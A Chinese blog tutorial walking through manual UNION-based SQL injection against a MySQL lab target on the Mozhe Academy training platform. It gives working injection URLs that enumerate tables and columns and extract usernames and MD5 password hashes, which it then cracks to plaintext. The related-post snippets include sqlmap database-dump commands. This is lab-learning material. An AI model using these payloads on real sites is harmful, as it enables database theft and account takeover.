SQL手工注入(MySQL数据库)详解---靶机(墨者学院)

已于 2022-03-07 09:44:38 修改
阅读量4.3k 收藏 4
点赞数
文章标签: 网络安全 sql
于 2022-03-02 17:10:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CSDN_caiqian/article/details/123227980
版权

SQL手工注入详解

一、判断是否存在注入点

如果页面中MySQL报错,证明该页面中存在SQL注入漏洞:

  1. 单引号 ’ ----> 页面错误
  2. and 1=1 ----> 页面正常
  3. and 1=2 ----> 页面错误
  4. ?id=随意输入------>页面错误

二、Mysql数据库基本结构

MYSQL数据库
  数据库A=网站A=数据库用户A
    表名
          列名
              数据
  数据库B=网站B=数据库用户B
    表名
          列名
              数据
  数据库C=网站C=数据库用户C
    表名
          列名
              数据

三、information_schema 简述

  1. MySQL5.0版本以上新增 information_schema 数据库
  2. information_schema 数据库储存当前数据库下所有的数据库名、表名、字段名等信息。
  3. 数据库中符号“.”代表下一级,如xiao.user标识xiao数据库下的user表名

举例:

数据库表名含义
information_schema.tables记录所有表名信息的表
information_schema.columns记录所有列名信息的表
table_schema数据库名称
table_name表名
column name列名

四、手工注入过程详解

1. 判断注入点

?id=随意输入数字11265,页面返回错误,判断有注入点。
在这里插入图片描述

2. 判断列名数量(字段数)

order by X 根据返回页面正确与错误的临界值,判断临界值为4
在这里插入图片描述

在这里插入图片描述

3.判断可利用字段

将id值设置成不成立,即可探测到可利用的字段数,判断可利用字段数为2,3字段

http://219.153.49.228:47468/new_list.php?id=-1 union select 1,2,3,4

或者

http://219.153.49.228:47468/new_list.php?id=1 and 1=2 union select 1,2,3,4

在这里插入图片描述

4. 信息收集

类型sql函数查询到信息
数据库版本version()5.7.22-0ubuntu0.16.04.
数据库名字database()mozhe_Discuz_StormGroup
数据库用户user()root@localhost
操作系统@@version_compile_osLinux
http://219.153.49.228:47063/new_list.php?id=-1 union select 1,version(),database(),4

http://219.153.49.228:47063/new_list.php?id=-1 union select 1,user(),@@version_compile_os,4

在这里插入图片描述
在这里插入图片描述

5. 获取表名

数据库版本为5.7,利用information_schema数据库查询表名

http://219.153.49.228:47063/new_list.php?id=-1%20union%20select%201,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'

查询到指定数据库mozhe_Discuz_StormGroup下表名有:StormGroup_member,notice
在这里插入图片描述

6. 获取列名

利用 union select 联合查询,获取StormGroup_member表下的列名

http://219.153.49.228:47063/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'

查询到列名有 id,name,password,status
在这里插入图片描述

7.获取指定数据

利用 union select 联合查询,获取指定数据,name,password。查询的时候尽量使用group_concat()防止漏数据

http://219.153.49.228:47063/new_list.php?id=-1 union select 1,group_concat(name),group_concat(password),4 from StormGroup_member

在这里插入图片描述

8.md5解密

356f589a7df439f6f744ff19bb8092c0 MD5解密 :dsan13

2d9dc71b7a2989dfb723ea224c73e7e7 MD5解密 :915944

9.登录获取KEY

在这里插入图片描述

今天有点冷灬
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
墨者学院 - SQL注入实战-MySQL
多崎巡礼的博客
08-08 2009
两种解法 一、利用sqlmap及其tamper模块base64encode使用 1. 看到id后面的参数可能是base64加密后的结果,我们尝试解密,解密结果为1 2.查看当前的系统信息 sqlmap -u "http://219.153.49.228:43371/show.php?id=MQo=" --tamper=base64encode 3.暴库 sqlmap -u "http:/...
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
多崎巡礼的博客
07-26 3244
此题很简单,可以完全参照 https://blog.csdn.net/qq_42357070/article/details/81215715 进行解题 以下用cms站点举例: https://pan.baidu.com/s/1uiO2cqZCGquQqyYWr0C7WQ     提交and 1=1 返回内容正常        And 1=2 返回内容为空 确定存在注入漏...
sqli-labs-master-注入学习靶机
01-19
sqli-labs是一个非常好的学习sql注入的一个游戏教程,是一个印度程序猿的搬砖建造的,对于了解sqlmap的原理很有帮助。
Mysql注入详细讲解
最新发布
2401_84466359的博客
05-24 885
*原理:**用户向数据库里存入恶意的数据,在数据被插入到数据库之前,肯定会对数据库进行转义处理,但用户输入的数据的内容肯定是一点摸样也不会变的存进数据库里,而一般都默认为数据库里的信息都是安全的,查询的时候不会进行处理,所以当用户的恶意数据被web程序调用的时候就有可能出发SQL注入。GET/POST提交数据时,发现提交的数据被加密了(可能js加密),那么在提交数据前,抓包,解密,将注入语句写好,然后将整个语句进行加密(相同加密算法),再将数据发过去。HTTP 头注入常常发生在程序采集用户信息的模块中。
欢迎来到训练场,SQL注入DVWA靶机
sinat_35855737的博客
05-11 1000
手把手带你飞,在DVWA靶机上练习sql注入
SQl注入学习
weixin_42451330的博客
06-08 946
如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为宽字节,像GB2312、GBK、GB18030、BIG5、Shift_JIS等这些编码都是常说的宽字节。
[MySQL] SQL注入——手工注入
ZXW_NUDT的博客
10-13 667
此次用到的是DVWA平台 DVWA Security设置安全模式为low 用SQL Injection模块,通过布尔逻辑注入查询当前表的所有lastname和firstname 1、通过union关键字注入,查询当前使用数据库 ' union select session_user(),' ' # 2、通过union关键字和concat()/concat_ws函数注入,查询当前数据库,当前用户名,MySQL版本,当前数据库路径 ' union select concat(database(),ver
SQLI-labs 通关笔记】靶场安装
fyrmaryt的博客
02-27 594
SQLI-labs通关笔记之安装及介绍篇。
E109-数据库安全-使用sqlmap注入mysql数据库.pdf
12-02
本文将深入探讨如何利用sqlmap工具对MySQL数据库进行SQL注入攻击,以此来演示并了解数据库的安全漏洞和防护措施。 SQL注入是一种常见的网络安全攻击方式,攻击者通过在Web应用的输入字段中插入恶意SQL代码,以获取...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
靶机网站实现简单SQL注入
真正的大师,永远都怀着一颗学徒的心。
07-15 1759
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、sql注入是什么?二、注入过程1.明确SQL注入总体思路(1)寻找注入点(2)判断后台数据库类型和服务器的类型(3)针对不同的数据库和服务器类型构建语句进行注入2.进行站点分析(1)判断注入-最经典的and 1=1(2)判断该表当前页面字段数(3)确定当前页面回显(4)在第三个字段处构建语句,获取库名,字段名,表名。(5)到此为止,我们已经可以通过表名和字段名查询到管理员的账号密码了(6)进入后台看是否能够成功登陆。总结
DDL操作数据库
weixin_45701447的博客
09-09 771
一.什么是 sql sructured Query Language:结构化查询语言 定义了操作所有 关系型数据库的规则 。每一种数据库操作的方式存在不一样的地方称为方言. 二.sql 通用的语法 1.sql可以单行书写 也可以多行书写 以 分号 结尾 2.mysql 不区分大小写但是关键字 建议大写 三.sql分类 1.DDL:操作数据库和表 (1)操作数据库:CRUD C:创建 创建数据库 create database 数据库名称; create database if not exists 数据库
sqlmap使用教程大全命令大全(图文)
热门推荐
Cwillchris的博客
03-15 6万+
我们先准备一个靶机,我这里拿经典的SQL大观园靶机 我们再url后面传参http://192.168.98.100/sqli-labs/Less-1/?id=1 接下来我们用此url进行SQLmap的教学http://192.168.98.100/sqli-labs/Less-1/?id=1 一、SQLmap基础操作 1.判断是否存在注入 假设目标注入点是http://192.168.98.100/sqli-labs/Less-1/?id=1,判断具是否存在注入的命令如下所示.
sql libs 练习sql注入(—)
qidiandexiaowu
03-02 874
最近学习sql注入里最简单的一种——联合查询注入。 现在写下来理清思路,也分享分享自己的收获。 联合查询的前提条件:页面上有显示位。 什么是显示位? 在一个在一个网站的正常页面,服务端执行SQL语句查询数据库中的数据,客户端将数 据展示在页面中,这个展示数据的位置就叫显示位。 联合查询的过程: 1、判断注入点 2、判断列数 3、获取所有数据库名 4、获取数据库所有表名 5、获取字段名 6、获取字段...
MySQL手工注入(内含实验)
weixin_57959384的博客
03-12 4014
网站的账号和密码在哪里? 数据库里。 数据库中储存着数据表,字段,数据,内容。结构化查询语句(SQL) 什么是SQL注入SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 实验: 墨者学院,注册,登录。 找到靶场 (实验名称:MySQL手工注入漏洞测试(MySQL数据库)) 一、判断注
MySQL手工注入
xiao_he0123的博客
03-16 3480
MySQL手工注入基本知识前言一、SQL注入的原理二,如何判断是否有注入点三、步骤1.MySQL信息收集2.数据注入四,案例演示1.判断是否有注入点2.确认字段数3.判断回显点4.查询相关内容1查询库名2.查询版本号3.查询数据库表名4.查询列名信息5.查询具体数据 前言 此次文章建立在MySQL数据库的基础上 一、SQL注入的原理 可控变量带入数据库查询,变量未存在过滤或者过滤不完整 二,如何判断是否有注入点 and 1=1页面正常 and 1=2页面错误则表明有注入点 同时也可以对参数随意赋值判断如果
mysql手工注入环境_MYSQL手工注入方法和流程
weixin_30629043的博客
01-19 257
今天我们接着以sqli-labs实验环境的mysql数据库为例来讲解mysql数据库手工注入的方法和流程。mysql数据库是一个强大和使用广泛的数据库,它分为社区版和商业版,而且开放源码。这节课开始之前,先给大家介绍下mysql数据库的结构以及它强大的内置库。MYSQL数据库的结构以及内置库mysql数据库主要是由连接层、SQL层和存储引擎层组成的。其中连接层主要负责处理通讯协议、线程、身份数据验...
使用python-socket库实现对靶机的系统识别
06-03
使用Python的socket库可以实现对靶机的系统识别。具体实现步骤如下: 1. 导入socket库: ```python import socket ``` 2. 创建socket连接: ```python client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) ``` 3. 连接目标主机: ```python target_host = "192.168.0.1" target_port = 80 client_socket.connect((target_host, target_port)) ``` 4. 发送HTTP请求: ```python request = "GET / HTTP/1.1\r\nHost: 192.168.0.1\r\n\r\n" client_socket.send(request.encode()) ``` 5. 接收响应: ```python response = client_socket.recv(1024) ``` 6. 解析响应,判断目标主机的操作系统: ```python if "Windows" in response: print("Target host is running Windows OS.") elif "Linux" in response: print("Target host is running Linux OS.") else: print("Target host OS cannot be determined.") ``` 上述代码的实现原理是通过HTTP请求头中的User-Agent字段来判断目标主机的操作系统。Windows和Linux的User-Agent字段是不同的,因此可以通过User-Agent字段来判断目标主机的操作系统。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

今天有点冷灬

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值